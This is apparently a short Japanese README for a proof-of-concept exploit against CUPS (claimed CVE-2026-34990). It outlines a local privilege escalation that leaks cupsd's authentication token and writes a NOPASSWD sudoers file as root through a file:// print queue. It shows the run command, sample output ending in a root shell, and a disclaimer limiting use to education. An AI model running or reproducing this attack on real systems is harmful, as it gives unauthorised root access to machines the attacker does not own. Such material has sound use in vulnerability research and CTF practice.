
root として実行されている CUPS <= 2.4.16 に対するローカル権限昇格。 cupsd の Local 認証トークンを漏洩させ、その後 file:// プリントキューを介して root として NOPASSWD sudoers フラグメントを書き込む。
python3 poc.py
成功時:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
その後:
sudo -i
このスクリプトは教育目的のみを意図しています。作者は、このエクスプロイトによるいかなる誤用や損害についても責任を負いません。脆弱性をテストまたは悪用する前に、必ず許可を得ていることを確認してください!